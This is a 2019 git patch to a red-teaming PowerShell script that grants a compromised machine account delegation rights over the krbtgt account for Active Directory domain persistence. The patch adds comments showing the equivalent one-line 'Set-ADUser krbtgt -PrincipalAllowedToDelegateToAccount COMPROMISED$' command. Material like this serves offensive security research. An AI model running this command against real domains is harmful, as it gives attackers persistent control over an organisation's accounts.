From a5114ce0f613d69eaab71c15bed6ab89c5fd00f0 Mon Sep 17 00:00:00 2001 From: mgeeky Date: Thu, 22 Aug 2019 15:47:01 +0200 Subject: [PATCH] fixed paramter name --- red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1 | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1 b/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1 index 3b30f4a..2420138 100644 --- a/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1 +++ b/red-teaming/Set-PrincipalAllowedToDelegateToAccount.ps1 @@ -12,6 +12,10 @@ # allowing incoming trust to the previously compromised Machine object, as described # by Elad Shamir in his: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#unconstrained-domain-persistence # +# It does the same as the following commands: +# PS> Import-Module ActiveDirectory +# PS> Set-ADUser krbtgt -PrincipalAllowedToDelegateToAccount COMPROMISED$ +# # This script requires PowerView to be loaded first. # # This is basically rewritten script from Harmj0y's blog post here: